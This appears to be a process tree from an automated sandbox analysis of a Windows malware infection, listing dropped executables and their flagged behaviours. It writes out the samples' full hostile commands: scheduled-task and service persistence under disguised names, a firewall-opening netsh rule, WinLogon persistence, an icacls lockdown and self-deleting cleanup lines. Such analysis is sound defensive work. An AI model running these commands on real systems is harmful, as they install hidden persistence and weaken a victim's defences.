C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TG5T6.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-TG5T6.tmp\setup_2.tmp" /SL5="$8005E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7M94O.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-7M94O.tmp\setup_2.tmp" /SL5="$303F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT11⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a9⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"8⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 9127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun1905815e51282417.exeSun1905815e51282417.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun198361825f4.exeSun198361825f4.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-3JHSO.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-3JHSO.tmp\Sun1966fb31dd5a07.tmp" /SL5="$50030,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun1966fb31dd5a07.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-NGOI0.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-NGOI0.tmp\Ze2ro.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\CLODCIRXRY\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\CLODCIRXRY\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HP43H.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-HP43H.tmp\ultramediaburner.tmp" /SL5="$30280,281924,62464,C:\Program Files\Mozilla Firefox\CLODCIRXRY\ultramediaburner.exe" /VERYSILENT10⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
- Checks whether UAC is enabled
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b0-23bb2-d99-f40ab-b9db0b2fc96d8\Vaerigipaeky.exe"C:\Users\Admin\AppData\Local\Temp\b0-23bb2-d99-f40ab-b9db0b2fc96d8\Vaerigipaeky.exe"9⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Temp\74-71abb-251-9e39e-f344b944ebcd8\Wilowesaly.exe"C:\Users\Admin\AppData\Local\Temp\74-71abb-251-9e39e-f344b944ebcd8\Wilowesaly.exe"9⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qx3n3ee0.3ba\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\qx3n3ee0.3ba\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qx3n3ee0.3ba\GcleanerEU.exe /eufive11⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nva3lj2d.jnu\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\nva3lj2d.jnu\installer.exeC:\Users\Admin\AppData\Local\Temp\nva3lj2d.jnu\installer.exe /qn CAMPAIGN="654"11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nva3lj2d.jnu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nva3lj2d.jnu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632126445 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f222h1n5.1ik\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\f222h1n5.1ik\anyname.exeC:\Users\Admin\AppData\Local\Temp\f222h1n5.1ik\anyname.exe11⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5zu3llk.5pb\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\j5zu3llk.5pb\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j5zu3llk.5pb\gcleaner.exe /mixfive11⤵
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B094.exeC:\Users\Admin\AppData\Local\Temp\B094.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B094.exeC:\Users\Admin\AppData\Local\Temp\B094.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\B24B.exeC:\Users\Admin\AppData\Local\Temp\B24B.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\B9ED.exeC:\Users\Admin\AppData\Local\Temp\B9ED.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B9ED.exeC:\Users\Admin\AppData\Local\Temp\B9ED.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\D332.exeC:\Users\Admin\AppData\Local\Temp\D332.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\E544.exeC:\Users\Admin\AppData\Local\Temp\E544.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E544.exeC:\Users\Admin\AppData\Local\Temp\E544.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\E544.exe"C:\Users\Admin\AppData\Local\Temp\E544.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E544.exe"C:\Users\Admin\AppData\Local\Temp\E544.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build2.exe"C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build2.exe"C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build2.exe"7⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build3.exe"C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build3.exe"C:\Users\Admin\AppData\Local\1ecad5b7-795c-42b8-a0d4-f57f9aac9d72\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FD52.exeC:\Users\Admin\AppData\Local\Temp\FD52.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\200D.exeC:\Users\Admin\AppData\Local\Temp\200D.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\3A5D.exeC:\Users\Admin\AppData\Local\Temp\3A5D.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rztuyuup\3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tyumknz.exe" C:\Windows\SysWOW64\rztuyuup\3⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create rztuyuup binPath= "C:\Windows\SysWOW64\rztuyuup\tyumknz.exe /d\"C:\Users\Admin\AppData\Local\Temp\3A5D.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description rztuyuup "wifi internet conection"3⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start rztuyuup3⤵
-
-
C:\Users\Admin\yfdotocq.exe"C:\Users\Admin\yfdotocq.exe" /d"C:\Users\Admin\AppData\Local\Temp\3A5D.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ysblybgs.exe" C:\Windows\SysWOW64\rztuyuup\4⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config rztuyuup binPath= "C:\Windows\SysWOW64\rztuyuup\ysblybgs.exe /d\"C:\Users\Admin\yfdotocq.exe\""4⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start rztuyuup4⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8785.bat" "4⤵
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\46A2.exeC:\Users\Admin\AppData\Local\Temp\46A2.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5CFA.exeC:\Users\Admin\AppData\Local\Temp\5CFA.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\6807.exeC:\Users\Admin\AppData\Local\Temp\6807.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\75B4.exeC:\Users\Admin\AppData\Local\Temp\75B4.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\75B4.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8E7D.exeC:\Users\Admin\AppData\Local\Temp\8E7D.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\9E7C.exeC:\Users\Admin\AppData\Local\Temp\9E7C.exe2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9E7C.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A776.exeC:\Users\Admin\AppData\Local\Temp\A776.exe2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A776.exeC:\Users\Admin\AppData\Local\Temp\A776.exe3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C80E.exeC:\Users\Admin\AppData\Local\Temp\C80E.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\D28F.exeC:\Users\Admin\AppData\Local\Temp\D28F.exe2⤵
- Suspicious use of SetThreadContext
-
C:\ProgramData\ZZZZZ.exe"C:\ProgramData\ZZZZZ.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\DriverMaster.exeC:\Users\Admin\AppData\Local\Temp\DriverMaster.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe4⤵
-
C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exeC:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe5⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe"C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe"6⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ivdO3sdkSg.bat"7⤵
-
C:\Windows\system32\chcp.comchcp 650018⤵
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
-
C:\Boot\bg-BG\csrss.exe"C:\Boot\bg-BG\csrss.exe"8⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D28F.exe"C:\Users\Admin\AppData\Local\Temp\D28F.exe"3⤵
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\tghcfswC:\Users\Admin\AppData\Roaming\tghcfsw2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\tghcfswC:\Users\Admin\AppData\Roaming\tghcfsw3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Roaming\wihcfswC:\Users\Admin\AppData\Roaming\wihcfsw2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exeC:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exeC:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exe --Task3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exeC:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exeC:\Users\Admin\AppData\Local\1f7193e1-6654-45b1-938c-e4d558782761\E544.exe --Task3⤵
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D10A42B5942484CD4DC48611716E36FC C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 727E2D2178FDBDD13CFD9C2E50D8AD132⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
